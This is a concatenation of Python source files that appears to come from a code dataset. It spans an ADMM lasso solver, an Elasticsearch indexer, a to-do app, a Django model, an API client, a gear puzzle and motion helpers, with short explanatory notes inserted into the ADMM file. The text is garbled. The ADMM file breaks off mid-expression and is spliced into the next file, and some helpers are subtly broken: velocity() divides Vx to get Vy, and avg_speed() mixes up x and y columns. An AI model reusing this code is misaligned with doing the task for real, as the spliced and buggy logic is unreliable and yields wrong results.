So they are always the\n #(r,n_c) entery of one block and the (r,0) entry of the block to the right.\n for i,idx in enumerate(idx3):\n blk1,r_b1,c_b1=determineBlock(r3[i],c3[i])\n idx_in_blk1=np.ravel_multi_index((r_b1,c_b1),(n_r,n_c),order='F')\n I=np.tile(np.arange(idx*T,(idx+1)*T),2)\n J1=np.arange(blk1*n_x_blk+idx_in_blk1*T,\n blk1*n_x_blk+(idx_in_blk1+1)*T)\n blk2,r_b2,c_b2=(blk1+n_boundary_rows+1,r_b1,0)\n idx_in_blk2=np.ravel_multi_index((r_b2,c_b2),(n_r,n_c),order='F')\n J2=np.arange(blk2*n_x_blk+idx_in_blk2*T,\n blk2*n_x_blk+(idx_in_blk2+1)*T) \n \n I_vec.append(I);J_vec.append(np.hstack((J1,J2))) \n #===column boundary points===\n \n #===non-boundary points===\n idx4=np.delete(np.arange(n_cols*n_rows),np.hstack((idx1,idx2,idx3)))\n r4,c4=np.unravel_index(idx4,(n_rows,n_cols),'F')\n for i,idx in enumerate(idx4):\n blk,r_b,c_b=determineBlock(r4[i],c4[i])\n idx_in_blk=np.ravel_multi_index((r_b,c_b),(n_r,n_c),order='F')\n I=np.arange(idx*T,(idx+1)*T)\n J=np.arange(blk*n_x_blk+idx_in_blk*T,blk*n_x_blk+(idx_in_blk+1)*T)\n \n I_vec.append(I);J_vec.append(J) \n \n I_vec=np.hstack(I_vec);J_vec=np.hstack(J_vec)\n A=spmatrix(np.ones(I_vec.size),I_vec,J_vec,\n size=(I_vec.max()+1,J_vec.max()+1)) \n #===non-boundary points===\n \n return A\n\n\n\ndef compute_primal(Y,v,D,Kinv,alpha,rho):\n u = -D.T*v #compute u \n Y2=mul(Kinv,Y**2)\n z1=u-Kinv+rho*alpha \n W=matrix(np.real( lambertw(mul((Y2/rho),exp(-z1/rho))) ))\n beta= W +(z1/rho)\n\n return beta\n \ndef x_update(Y,D,G,h,Kinv,alpha,rho):\n '''\n This function performs the x-update step of the ADMM algorithm.\n See Boyd et al, 2010, page 55.\n ''' \n\n m,n=D.size\n ki=matrix(Kinv)\n \n def F(v=None,z=None): \n if v is None: return 0,matrix(0.0,(m,1))\n \n u = -D.T*v #compute u\n \n #===define some auxilary variables===\n Y2=mul(ki,Y**2)\n z1=u-ki+rho*alpha \n \n W=matrix(np.real( lambertw(mul((Y2/rho),exp(-z1/rho))) ))\n h_opt= W +(z1/rho)\n dh_to_du=(1/rho)*(div(1,1+W))\n z2=mul(Y2,exp(-h_opt))\n z3=z2+z1-rho*h_opt\n #===define some auxilary variables===\n \n #====compute f===\n f=sum( mul(u,h_opt)-mul(ki,h_opt)-z2-(rho/2)*(h_opt-alpha)**2 )\n #====compute f===\n \n #===compute Jacobian=== \n df_to_du=h_opt+mul(dh_to_du,z3)\n Df = -df_to_du.T*D.T\n if z is None: return f, Df \n #===compute Jacobian=== \n \n #===compute Hessian===\n d2h_to_du2=(1/rho**2)*div(W,(1+W)**3)\n d2f_to_du2=mul(d2h_to_du2,z3)+mul(dh_to_du,2-mul(z2+rho,dh_to_du))\n H=D*spdiag(mul(z[0],d2f_to_du2))*D.T\n #===compute Hessian===\n \n return f, Df, H \n\n solvers.options['maxiters']=500;solvers.options['show_progress']=False\n sol=solvers.cp(F=F,G=G,h=h)\n v=sol['x'];#dual solution\n x=compute_primal(Y,v,D,matrix(Kinv),alpha,rho)#primal solution\n \n return x\n\ndef scale_h(h,K,lh_trend,T,nr_blk,nc_blk,r_D,c_D):\n '''\n Let D (the matrix in generalized lasso) have size (r_Dxc_D).\n We have h^T=[1_(c_D)|L_t|L_s|L_lh|L_t|L_s|L_lh] where:\n 1_(c_D) is a (c_Dx1) vector of ones. c_D is the no. of columns of D.\n L_t=lam_t*1_(nt) where nt=(T-2)*nr_blk*nc_blk is the number of \n temporal constraints.\n L_s=lam_s*1_(ns) where ns=r_D-nt is the number of spatial constraints.\n L_lh=lam_t*1_(nlh) where nlh=n_years*nr_blk*nc_blk is the number\n of long horizon constraints. If lh_trend is False `h` does not \n include this part.\n This function repalces each element of L_t by lam_t/k_(i,j) where \n k_(i,j) is the number of \n local variables corresponding to each global variable at position (i,j)\n on the grid. 
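compute_primal and the x-update objective above use the closed form beta = W((Y2/rho) * exp(-z1/rho)) + z1/rho, with W the Lambert function from scipy.special. Working backwards from W*exp(W) = (Y2/rho)*exp(-z1/rho), this beta appears to solve the stationarity equation rho*beta - Y2*exp(-beta) = z1, which is quick to confirm numerically:

```python
import numpy as np
from scipy.special import lambertw

rho, Y2, z1 = 0.1, 2.0, -0.5
beta = np.real(lambertw((Y2 / rho) * np.exp(-z1 / rho))) + z1 / rho
# residual of rho*beta - Y2*exp(-beta) - z1 should vanish to machine precision
assert abs(rho * beta - Y2 * np.exp(-beta) - z1) < 1e-9
```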
Note that there are T-2 temporal constraints corresponding \n to each position (i,j) on the grid and k_(i,j) is the same for all \n of them. \n '''\n\n n_t=nr_blk*nc_blk*(T-2);\n K=K[0::T]\n K1=matrix(np.tile(K,(T-2,1)).reshape((n_t,1),order='F'))\n h[c_D:(c_D+n_t)]=mul(h[c_D:(c_D+n_t)],K1)\n \n if lh_trend:\n n_year=T/52\n n_lh=(n_year-2)*nr_blk*nc_blk;n_s=r_D-n_lh-n_t\n K2=matrix(np.tile(K,(n_year-2,1)).reshape((n_lh,1),order='F'))\n h[(c_D+n_t+n_s):(c_D+n_t+n_s+n_lh)]=\\\n mul(h[(c_D+n_t+n_s):(c_D+n_t+n_s+n_lh)],K2)\n h[(c_D+r_D):(c_D+r_D+n_t)]=mul(h[(c_D+r_D):(c_D+r_D+n_t)],K1)\n h[(h.size[0]-n_lh):]=mul(h[(h.size[0]-n_lh):],K2)\n else:\n h[(c_D+r_D):(c_D+r_D+n_t)]=mul(h[(c_D+r_D):(c_D+r_D+n_t)],K1)\n \n return h\n\n\ndef consensusADMM_fit(dataMat,destDir,metadata,\n lam_t_vec,lam_s_vec,rho=.1,\n n_r_b=2,n_c_b=2,\n maxIter=1000,freq=100,\n lh_trend=True,wrapAround=True,\n earlyStopping=True,patience=2,tol=.1):\n\n #===metadata===\n n_rows,n_cols,T=(metadata['n_rows'],metadata['n_cols'],metadata['T']) \n #===metadata===\n \n #===check the compatability of grid size with sub-blocks size===\n if (((n_rows-1)%(n_r_b-1)!=0) or ((n_cols-1)%(n_c_b-1)!=0)):\n msg='In current implementation, n_rows-1 and n_cols-1 should be'+\\\n 'divisable by (n_r_b-1) and (n_c_b)-1, respectively.'\n raise ValueError(msg)\n #===check the compatability of grid size with sub-blocks size===\n \n #===convert to cvxopt matrix===\n Y=matrix(np.asarray(dataMat,dtype='float64').flatten())\n y_flat=dataMat.flatten()\n del dataMat;gc.collect()\n #===convert to cvxopt matrix===\n \n #===partition data===\n n_x_b=n_r_b*n_c_b*T#no. of local variables in each block\n A=ComputeLocToGlobVarTransform(n_rows,n_cols,T,n_r_b,n_c_b)\n n_z,n_x=A.size\n \n I=np.array(A.I).flatten();J=np.array(A.J).flatten()\n y_partitioned=np.zeros(n_x)\n y_partitioned[J]=y_flat[I]\n del y_flat;gc.collect()\n n_blocks=y_partitioned.size/n_x_b\n y_partitioned=y_partitioned.reshape((n_x_b,n_blocks),order='F')\n #each column of y_partitioned contains the data of a block \n #===partition data===\n \n #===compute K and Kinv===\n #K is no. of local variables corresponding each global variable and \n #Kinv is 1/K\n K=A*matrix(np.ones(A.size[1]))\n ki=np.array(div(1.,K)).flatten()\n Kinv=np.ones(n_x)\n Kinv[J]=ki[I]\n Kinv=Kinv.reshape((n_x_b,n_blocks),order='F')\n Kinv=np.ones(Kinv.shape)#???delete this\n del ki;gc.collect()\n #===compute no. 
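consensusADMM_fit below follows the standard scaled-form consensus ADMM pattern (block-wise x-updates, an averaging z-update through A and K, then the dual update w = w + x - z_hat; cf. Boyd et al. 2010, cited in x_update). The same three-step loop on a toy problem, minimizing sum_i (x_i - a_i)^2 subject to x_i = z, converges to the mean of a:

```python
import numpy as np

a = np.array([1.0, 2.0, 6.0])   # local data; the consensus optimum is a.mean()
rho = 1.0
x = np.zeros_like(a); w = np.zeros_like(a); z = 0.0
for _ in range(60):
    x = (2 * a + rho * (z - w)) / (2 + rho)  # local x-updates (closed form)
    z = np.mean(x + w)                       # z-update: average onto consensus
    w = w + x - z                            # scaled dual update
assert abs(z - a.mean()) < 1e-8
```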
of local variables corresponding each global variable===\n \n #===compute D===\n D=compute_cp_matrices(n_rows,n_cols,T,[],[],\n wrapAround=wrapAround,lh_trend=lh_trend,\n ifCompute_Gh=False)\n #===compute D===\n \n #===make sure the parameters are float===\n lam_t_vec=[float(lam_t) for lam_t in lam_t_vec]\n lam_s_vec=[float(lam_s) for lam_s in lam_s_vec]\n rho=float(rho)\n #===make sure the parameters are float=== \n\n #===compute solution for all lam_t and lam_s=== \n for i_t,lam_t in enumerate(lam_t_vec):\n for i_s,lam_s in enumerate(lam_s_vec): \n print('\\014')\n print('\\n'+ctime()+'...fitting model with lam_t=%.2f, lam_s=%.2f'%\\\n (lam_t,lam_s))\n \n #===initialize X,Z,W=== \n Z_hat=np.zeros((n_x_b,n_blocks))\n W=np.zeros((n_x_b,n_blocks));X=np.zeros((n_x_b,n_blocks))\n totalLoss=[]\n #===initialize X,Z,W===\n \n #===compute D,G,h for each block===\n #'b' means that these are computed for each block\n Db,Gb,hb=compute_cp_matrices(n_r_b,n_c_b,T,lam_t,lam_s,\n ifCompute_Gh=True,wrapAround=False,\n lh_trend=lh_trend)\n m_b,n_b=Db.size\n #===compute D,G,h for each block===\n \n #results filename \n result_fn = 'rho_'+str(rho)+'_lam_t_'+str(lam_t)+\\\n '_lam_s_'+str(lam_s)\n \n \n print('time iteration loss') \n\n #---ADMM loop---\n for it in range(maxIter): \n #---x-update---\n alpha=Z_hat-W\n for blk in range(n_blocks):\n hb=scale_h(hb,Kinv[:,blk],True,T,n_r_b,n_c_b,m_b,n_b)\n alpha_b=matrix(alpha[:,blk])\n Y_b=matrix(y_partitioned[:,blk])\n X[:,[blk]]=np.array(x_update(Y_b,Db,Gb,hb,Kinv[:,blk],\n alpha_b,rho))\n \n X_vec=matrix(X.flatten(order='F'))\n #---x-update---\n \n #---z-update---\n Z=div(A*X_vec,K)\n #---z-update---\n \n #---w-update---\n Z_hat=np.zeros(n_x)\n Z_hat[J]=np.array(Z).flatten()[I]\n Z_hat=Z_hat.reshape((n_x_b,n_blocks),order='F') \n \n W=W+X-Z_hat\n #---w-update---\n \n if ((it==0) or ((it+1)%freq==0)):\n totalLoss.append(computeLoss(Z,Y,D,lam_t,lam_s,\n T,n_rows,n_cols,lh_trend))\n print(ctime()+' %5.0f %.1f'\\\n %(it+1,totalLoss[-1]))\n if earlyStopping and (len(totalLoss)>patience):\n chng=100*np.abs(totalLoss[-patience]-\\\n totalLoss[-patience:])/\\\n totalLoss[-patience]\n #if change in totalLoss is less than tol%\n if np.max(chng)= len(data.index):\n to = len(data.index)\n percentage = int((position / len(data.index)) * 1000) / 10\n print(f'{percentage}% {position}/{len(data.index)}')\n bulk(es, get_section(data, position, to), index=index_name)\n if to >= len(data.index):\n return\n position += bulk_size\n\n\ndef get_section(data, frm, to):\n for i in range(frm, to):\n yield json.dumps(create_dict(data.iloc[i]))\n\n\ndef create_dict(row):\n year = row['Meldedatum'][0:4]\n month = row['Meldedatum'][5:7]\n day = row['Meldedatum'][8:10]\n date = year+'/'+month+'/'+day\n result = {'date': date,\n 'kreis': row['Landkreis'],\n 'land': row['Bundesland'],\n 'anzahlFall': int(row['AnzahlFall']),\n 'anzahlTodesfall': int(row['AnzahlTodesfall']),\n 'geschlecht': str(row['Geschlecht']),\n 'altersgruppe': str(row['Altersgruppe'])\n }\n return result\n\n\nif __name__ == '__main__':\n if es.indices.exists(index=index_name):\n print(f\"Deleting index '{index_name}'.\")\n es.indices.delete(index=index_name)\n time.sleep(5)\n\n print('Reading data.')\n df = pd.read_csv(file_name)\n\n print(f'Indexing {df.size} documents.')\n bulk_index(df)\n","repo_name":"txtData/rkiVisualizer","sub_path":"rki_indexer.py","file_name":"rki_indexer.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} 
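The RKI indexer above batches documents by hand (bulk_size, position, get_section); the elasticsearch helpers also ship streaming_bulk, which does the chunking itself and reports per-document status. A sketch under the same es/index_name/create_dict names (verify the keyword set against your client version):

```python
from elasticsearch.helpers import streaming_bulk

def index_all(es, data, index_name, chunk_size=10_000):
    actions = (create_dict(data.iloc[i]) for i in range(len(data.index)))
    for ok, item in streaming_bulk(es, actions, index=index_name,
                                   chunk_size=chunk_size):
        if not ok:
            print("failed:", item)
```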
+{"seq_id":"12160764370","text":"# Write your code here\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import Column, Integer, String, Date\nfrom datetime import datetime, timedelta\n\n\nengine = create_engine('sqlite:///todo.db?check_same_thread=False')\nBase = declarative_base()\n\n\nclass Table(Base):\n __tablename__ = 'task'\n id = Column(Integer, primary_key=True)\n task = Column(String, default='default_value')\n deadline = Column(Date, default=datetime.today())\n\n def __repr__(self):\n return self.task\n\n\nBase.metadata.create_all(engine)\n\n\nSession = sessionmaker(bind=engine)\nsession = Session()\n\n# new_row = Table(task='Nothing to do!', deadline=datetime.strptime('04-09-2021', '%m-%d-%Y').date())\n# session.add(new_row)\n# session.add(Table(task='Visit an orphanage', deadline=datetime.today()))\n# session.add(Table(task='Analyze New product consumer-reception', deadline=datetime.today()))\n# session.add(Table(task='Visit an Ethiopia', deadline=datetime.today() + timedelta(days=2)))\n# session.commit()\n\nrows = session.query(Table).all()\ntoday = datetime.today()\nfor_today_rows = session.query(Table).filter(Table.deadline == today.date()).all()\nordered_rows = session.query(Table).order_by(Table.deadline).all()\ntomorrow = datetime.today() + timedelta(days=1)\ndelete_today = session.query(Table).filter(Table.deadline == datetime.today().date()).delete()\nspecific_rows_past_task = session.query(Table).filter(Table.deadline < datetime.today().date()).order_by(Table.deadline).all()\n\n\n# print(first_row.task)\n\ndef weeks_task():\n dl = today.date()\n for n_day in range(7):\n tasks = session.query(Table).filter(Table.deadline == dl).all()\n # print(tasks)\n if not tasks:\n print(f\"{dl.strftime('%A %#d %b')}:\")\n print(\"Nothing to do!\")\n print()\n else:\n print(f\"{dl.strftime('%A %#d %b')}:\")\n sn = 1\n for todo in tasks:\n task_to_do = todo.task\n print(f\"{sn}. {task_to_do}\")\n sn += 1\n print()\n\n dl += timedelta(days=1)\n\n\ndef all_task():\n everything_todo = session.query(Table).order_by(Table.deadline).all()\n sn = 0\n for i in everything_todo:\n sn += 1\n time_frame_day = i.deadline.day\n time_frame_month = i.deadline.strftime('%b')\n time_frame = str(f'{time_frame_day} {time_frame_month}')\n print(f'{sn}. {i}. {time_frame}')\n\n\ndef delete_task():\n rows_to_delete = session.query(Table).all()\n to_delete = session.query(Table).filter(Table.deadline).all()\n sn = 0\n if len(to_delete) > 0:\n for i in rows_to_delete:\n sn += 1\n print(f'{sn}. {i}.', i.deadline.strftime('%#d %b'))\n selected = int(input(\"> \"))\n deleted = rows_to_delete[selected - 1]\n print(deleted)\n session.delete(deleted)\n session.commit()\n print(\"The task has been deleted!\")\n else:\n print(\"Nothing to delete\")\n session.commit()\n\n\ndef missed_task():\n session.commit()\n task_missed = session.query(Table).filter(Table.deadline < datetime.today().date()).order_by(Table.deadline).all()\n sn = 0\n for i in task_missed:\n sn += 1\n i_day = i.deadline.day\n i_month = i.deadline.strftime('%b')\n print(f'{sn}. {i}. 
{i_day} {i_month}')\n\n\ndef selection():\n session.commit()\n today_task = for_today_rows\n menu = [\"1) Today's tasks\", \"2) Week's tasks\", \"3) All tasks\", \"4) Missed tasks\", \"5) Add task\", \"6) Delete task\", \"0) Exit\"]\n for option in menu:\n print(f'{option}')\n selected = int(input(\"enter an option \"))\n\n if selected == 6:\n session.commit()\n print(\"\\n\")\n print(\"Choose the number of the task your want to delete:\\n\")\n delete_task()\n session.commit()\n print(\"\\n\")\n selection()\n\n if selected == 5:\n print(\"\\n\")\n print(\"Enter task\")\n new_row = Table(task=input(\"> \"),\n deadline=datetime.strptime(input('Enter deadline\\n>'), '%Y-%m-%d').date())\n session.add(new_row)\n session.commit()\n print(\"The task has been added\")\n print(\"\\n\")\n selection()\n\n if selected == 4:\n session.commit()\n print(\"\\n\")\n print(\"Missed task:\")\n missed_task()\n print(\"\\n\")\n selection()\n\n if selected == 3:\n print(\"\\n\")\n print(\"All tasks:\")\n all_task()\n print(\"\\n\")\n selection()\n\n if selected == 2:\n print('\\n')\n weeks_task()\n selection()\n # print(all_task())\n\n if selected == 1 and len(rows) > 1:\n print(\"\\n\")\n\n time_frame_day = datetime.today().day\n time_frame_month = datetime.today().strftime('%b')\n today_date = str(f'Today {time_frame_day} {time_frame_month}:')\n print(today_date)\n for i in today_task:\n print(i)\n print(\"Nothing to do\")\n # print(new_row.task)\n print(\"\\n\")\n selection()\n\n elif selected == 1 and len(today_task) <= 0:\n print(\"\\n\")\n print(\"Today:\")\n print('Nothing to do!')\n print(\"\\n\")\n selection()\n\n else:\n print(\"\\n\")\n print(\"Bye!\")\n session.commit()\n\n\nselection()\n","repo_name":"Victor-UGB/Todo-list","sub_path":"task/todolist/todolist.py","file_name":"todolist.py","file_ext":"py","file_size_in_byte":5357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"27758436245","text":"import uuid\n\nfrom django.conf import settings\nfrom django.db import models\nfrom recurrence import deserialize\nfrom recurrence import serialize\nfrom recurrence.fields import RecurrenceField\n\n\nclass CustomAction(models.Model):\n uuid = models.UUIDField(default=uuid.uuid4, editable=False, unique=True)\n\n name = models.CharField(max_length=255)\n description = models.TextField()\n owner = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n\n recurrence = RecurrenceField()\n\n def get_rule(self):\n if self.recurrence.rrules is not None:\n if len(self.recurrence.rrules) > 0:\n return serialize(self.recurrence.rrules[0])\n return None\n\n def set_rule(self, i):\n self.recurrence = deserialize(i)\n\n rule = property(get_rule, set_rule)\n\n created = models.DateTimeField(auto_now_add=True)\n modified = models.DateTimeField(auto_now=True)\n","repo_name":"Shattenjagger/d_campaigns","sub_path":"campaigns/models/custom_action.py","file_name":"custom_action.py","file_ext":"py","file_size_in_byte":918,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34504611844","text":"\"\"\"示例 7-16 使用 clock 装饰器\"\"\"\n\nimport time\nfrom ch7.clockdeco1 import clock\n\n\n@clock\ndef snooze(seconds):\n time.sleep(seconds)\n\n\n@clock\ndef factorial(n):\n return 1 if n < 2 else n*factorial(n-1)\n\n\nif __name__ == \"__main__\":\n print(\"*\" * 40, 'Calling snozze(.123)')\n snooze(.123)\n print(\"*\" * 40, 'Calling factorial(6)')\n print('6! 
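The clockdeco_demo record above imports clock from ch7.clockdeco1, which is not included here; a minimal stand-in that preserves the wrapped function's metadata could look like this (a sketch, not necessarily the module's exact implementation):

```python
import time
import functools

def clock(func):
    @functools.wraps(func)  # keep __name__/__doc__ of the decorated function
    def clocked(*args):
        t0 = time.perf_counter()
        result = func(*args)
        elapsed = time.perf_counter() - t0
        arg_str = ', '.join(repr(arg) for arg in args)
        print(f'[{elapsed:0.8f}s] {func.__name__}({arg_str}) -> {result!r}')
        return result
    return clocked
```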
= ', factorial(6))","repo_name":"sbwcwso/fluent_python_notes","sub_path":"ch7/clockdeco_demo.py","file_name":"clockdeco_demo.py","file_ext":"py","file_size_in_byte":368,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"4018696670","text":"import requests\nimport json\nimport threading\n\nfrom collections import defaultdict\n\nclass Cox():\n def __init__(self):\n self.url_prefix = \"http://api.coxauto-interview.com/api/\"\n self.datasetId = \"\"\n self.vehicleIds = []\n self.all_dealers = defaultdict(list)\n self.all_vehicles = {}\n self.threads = []\n self.d_threads = []\n\n ''' Sets up get method with the datasetID api url and retrieves the dataset ID. '''\n def get_dataset_id(self):\n try:\n dataset_url = f\"{self.url_prefix}datasetId\"\n datasetId = requests.get(dataset_url).json()[\"datasetId\"]\n self.datasetId = datasetId\n except requests.exceptions.RequestException as error:\n \tprint(\"Error: \", error)\n\n ''' Sets up get method with the vehicles api url and retrieves all the vehicle IDs. '''\n def get_vehicle_ids(self):\n try:\n vehicleIds_url = f\"{self.url_prefix}{self.datasetId}/vehicles\"\n vehicleIds = requests.get(vehicleIds_url).json()[\"vehicleIds\"]\n self.vehicleIds = vehicleIds\n except requests.exceptions.RequestException as error:\n \tprint(\"Error: \", error)\n\n ''' Make a get request with each vehicle ID if it hasn't been visited yet. '''\n def get_vehicle_info(self, vehicleId):\n if vehicleId not in self.all_vehicles:\n vehicle_url = f\"{self.url_prefix}{self.datasetId}/vehicles/{vehicleId}\"\n vehicle_info = requests.get(vehicle_url).json()\n self.all_vehicles[vehicleId] = vehicle_info\n\n ''' Compiles all vehicle requests needed into threads and runs them all simultaneously. '''\n def compile_vehicle_threads(self):\n for vehicleId in self.vehicleIds:\n d = threading.Thread(target=self.get_vehicle_info, args=(vehicleId,))\n self.threads.append(d)\n for thread in self.threads:\n thread.start()\n for thread in self.threads:\n thread.join()\n\n ''' Make a get request with each dealer ID if it hasn't been visited yet. '''\n def get_dealer_info(self, vehicleId):\n dealerId = self.all_vehicles[vehicleId][\"dealerId\"]\n if dealerId not in self.all_dealers:\n dealer_url = f\"{self.url_prefix}{self.datasetId}/dealers/{dealerId}\"\n dealer_info = requests.get(dealer_url).json()\n self.all_dealers[dealerId] = dealer_info\n\n ''' Compiles all dealer requests needed into threads and runs them all simultaneously. '''\n def compile_dealer_threads(self):\n for vehicleId in self.vehicleIds:\n d_thread = threading.Thread(target=self.get_dealer_info, args=(vehicleId,))\n self.d_threads.append(d_thread)\n for d_thread in self.d_threads:\n d_thread.start()\n for d_thread in self.d_threads:\n d_thread.join()\n\n ''' Retrieves info on each vehicle and the corresponding dealer, and then stores it all in a dictionary. '''\n def add_vehicles_to_dealers(self):\n for vehicleId in self.vehicleIds:\n dealerId = self.all_vehicles[vehicleId][\"dealerId\"]\n self.all_dealers[dealerId][\"vehicles\"] = self.all_dealers[dealerId].get(\"vehicles\",[])\n self.all_dealers[dealerId][\"vehicles\"].append({k: v for k,v in self.all_vehicles[vehicleId].items() if k != \"dealerId\"})\n\n ''' Initializes all required data and posts the answer. 
'''\n def get_answer(self):\n self.get_dataset_id()\n self.get_vehicle_ids()\n self.compile_vehicle_threads()\n self.compile_dealer_threads()\n self.add_vehicles_to_dealers()\n dealers = {\"dealers\": list(self.all_dealers.values())}\n answer_url = f\"{self.url_prefix}{self.datasetId}/answer\"\n answer_response = requests.post(answer_url, json=dealers).json()\n total_seconds = (answer_response[\"totalMilliseconds\"] / 1000) % 60\n print(f\"Success: {answer_response['success']}\")\n print(f\"Total time: {total_seconds} seconds\")\n return answer_response\n\nif __name__ == '__main__':\n cox = Cox()\n cox.get_answer()\n","repo_name":"ChadLei/cox-automotive-challenge","sub_path":"swagger.py","file_name":"swagger.py","file_ext":"py","file_size_in_byte":4090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19479016971","text":"\r\ndef rotateGear(gearState, direction) :\r\n\tif direction == 1 : # rotating clock direction\r\n\t\tgearState = [gearState[7]] + gearState[0:7]\r\n\r\n\telif direction == -1 : # rotating un-clock direction\r\n\t\tgearState = gearState[1:8] + [gearState[0]]\r\n\r\n\treturn gearState\r\n\r\n\r\ndef cycleGear(gearNum, direction, gears) :\r\n\trotateCheck = [0,0,0,0] # decide rotate or not list\r\n\r\n\trotateCheck[gearNum] += direction # given gear rotate by given direction\r\n\r\n\toriginGearNum = gearNum\r\n\toriginDirection = direction\r\n\r\n\tif gearNum > 0 : # rotating gear proceeding to left\r\n\t\t\r\n\t\tfor cycleIndex in range(gearNum) :\t\t\r\n\t\t\t\r\n\t\t\tif gears[gearNum][6] != gears[gearNum-1][2] and gearNum > 0 :\r\n\t\t\t\t\r\n\t\t\t\tdirection *= (-1) # change the direction\r\n\t\t\t\trotateCheck[gearNum-1] += direction\r\n\r\n\t\t\t\tgearNum -= 1 # proceed to left gear\r\n\t\t\r\n\t\t\telse :\r\n\t\t\t\tbreak\r\n\t\r\n\tgearNum = originGearNum\r\n\tdirection = originDirection\r\n\r\n\tif gearNum < 3 : # rotating gear proceeding to right\r\n\r\n\t\tfor cycleIndex in range(3 - gearNum) :\r\n\r\n\t\t\tif gears[gearNum][2] != gears[gearNum+1][6] and gearNum < 3 :\r\n\r\n\t\t\t\tdirection *= (-1) # change the direction\r\n\t\t\t\trotateCheck[gearNum+1] += direction\r\n\t\t\t\t\r\n\t\t\t\tgearNum += 1 # proceed to right gear\r\n\t\t\r\n\t\t\telse :\r\n\t\t\t\tbreak\r\n\r\n\t# print(f\"rotation : {rotateCheck}\")\r\n\r\n\tfor rotatingIndex in range(len(rotateCheck)) :\r\n\t\t\r\n\t\tif rotateCheck[rotatingIndex] != 0 :\r\n\t\t\r\n\t\t\tgears[rotatingIndex] = rotateGear(gears[rotatingIndex], rotateCheck[rotatingIndex]) # rotate gears refer to 'rotateCheck'\r\n\r\n\treturn gears # return all rotated gears list\r\n\r\n\r\nif __name__ == \"__main__\" :\r\n\r\n\tgearList = []\r\n\r\n\tfor gearInputIndex in range(4) :\r\n\t\tsingleGear = list(input())\r\n\r\n\t\tfor gearIndex in range(len(singleGear)) :\r\n\t\t\tsingleGear[gearIndex] = int(singleGear[gearIndex]) # convert strings to integers\r\n\r\n\t\tgearList.append(singleGear)\r\n\t\t\r\n\t\t# 3시방향 : 2 / 9시방향 : 6\r\n\t\r\n\t#print(f\"cycle before : {gearList}\")\r\n\r\n\trotateTimes = int(input())\r\n\r\n\tfor rotateIndex in range(rotateTimes) :\r\n\t\trotateInput = input().split()\r\n\r\n\t\trotateGearNum = int(rotateInput[0]) - 1 # subtract 1, because match to array number\r\n\t\trotateDirection = int(rotateInput[1])\r\n\r\n\t\tgearList = cycleGear(rotateGearNum, rotateDirection, gearList) # decide given and surrounded gears are rotated or not \r\n\t\t\r\n\t\t#print(f\"cycle {rotateIndex} : {gearList}\")\r\n\r\n\tscore = 0\r\n\t\r\n\tfor scoringIndex 
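The Cox client above spawns and joins one threading.Thread per vehicle and per dealer; concurrent.futures expresses the same fan-out with a bounded pool and far less bookkeeping. A sketch that reuses the instance's get_vehicle_info and vehicleIds:

```python
from concurrent.futures import ThreadPoolExecutor

def fetch_all_vehicles(cox, max_workers=32):
    with ThreadPoolExecutor(max_workers=max_workers) as pool:
        # map() consumes the iterator, blocking until every request finishes
        list(pool.map(cox.get_vehicle_info, cox.vehicleIds))
```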
in range(len(gearList)) :\r\n\t\tscore += gearList[scoringIndex][0] * (2 ** scoringIndex) # add the scores\r\n\r\n\tprint(score)\r\n","repo_name":"shasuri/AlgorithmStudy","sub_path":"albbu/3rd_week/14891.py","file_name":"14891.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"71993690327","text":"\"\"\"\nComputes classic and statistical mechanics\n\nAll the formulas intended for using with the pandas apply funcion on a groupby.\n\nWhen dataframe is expressed as df, then implies a normal dataframe. On th other hand, when dfi is mentioned,\nit means that the Dataframe must be frame indexed.\n\n\"\"\"\nimport logging\n\nimport numpy as np\nimport pandas as pd\n\nlogger = logging.getLogger(__name__)\n\n\ndef speed_acc(df, x='x', y='y', time='time', frame='frame'):\n df = df.set_index(frame).sort_index()\n df.loc[:, 'dist'] = (df[x] ** 2 + df[y] ** 2).map(np.sqrt)\n d = df.loc[:, [x, y, 'dist', time]].diff().rename(\n columns={x: 'dx', y: 'dy', 'dist': 'dD', time: 'dt'})\n df.loc[:, 'speed'] = d.dD / d.dt\n df.loc[:, 'acc'] = d.dD.diff() / d.dt\n return df.reset_index()\n\n\ndef velocity(df, x='x', y='y', time='time', frame='frame'):\n df = df.set_index(frame).sort_index()\n df = df.loc[[x, y, time]].diff().rename(columns={x: 'Vx', y: 'Vy', time: 'dt'})\n df.loc[:, 'Vx'] = df['Vx'] / df['dt']\n df.loc[:, 'Vy'] = df['Vx'] / df['dt']\n return df.reset_index()\n\n\ndef avg_speed(df, frame='frame', time='time', centrosome_label_col='centrosome'):\n df = df.set_index(frame).sort_index()\n dfa = df[df[centrosome_label_col] == 'A']\n dfb = df[df[centrosome_label_col] == 'B']\n if not dfa.empty and not dfb.empty:\n ddi = np.sqrt((dfb['x'].iloc[0] - dfa['y'].iloc[0]) ** 2 + (dfb['y'].iloc[0] - dfa['y'].iloc[0]) ** 2)\n ddf = np.sqrt((dfb['x'].iloc[-1] - dfa['y'].iloc[-1]) ** 2 + (dfb['y'].iloc[-1] - dfa['y'].iloc[-1]) ** 2)\n dd = np.sqrt((ddf - ddi) ** 2)\n dt = df[time].iloc[-1] - df[time].iloc[0]\n return dd / dt\n\n\ndef get_speed_acc(df, x='x', y='y', time='time', frame='frame', group=None):\n if df.empty:\n raise Exception('df is empty')\n kwargs = {'x': x, 'y': y, 'time': time, 'frame': frame}\n dout = df.groupby(group).apply(speed_acc, **kwargs).reset_index(drop=True)\n return dout\n\n\ndef get_speed_acc_rel_to(df, x='x', y='y', rx='rx', ry='ry', time='time', frame='frame', group=None):\n if df.empty:\n raise Exception('df is empty')\n kwargs = {'x': x, 'y': y, 'time': time, 'frame': frame}\n dout = df.groupby(group).apply(speed_acc, **kwargs).reset_index(drop=True)\n return dout\n\n\ndef 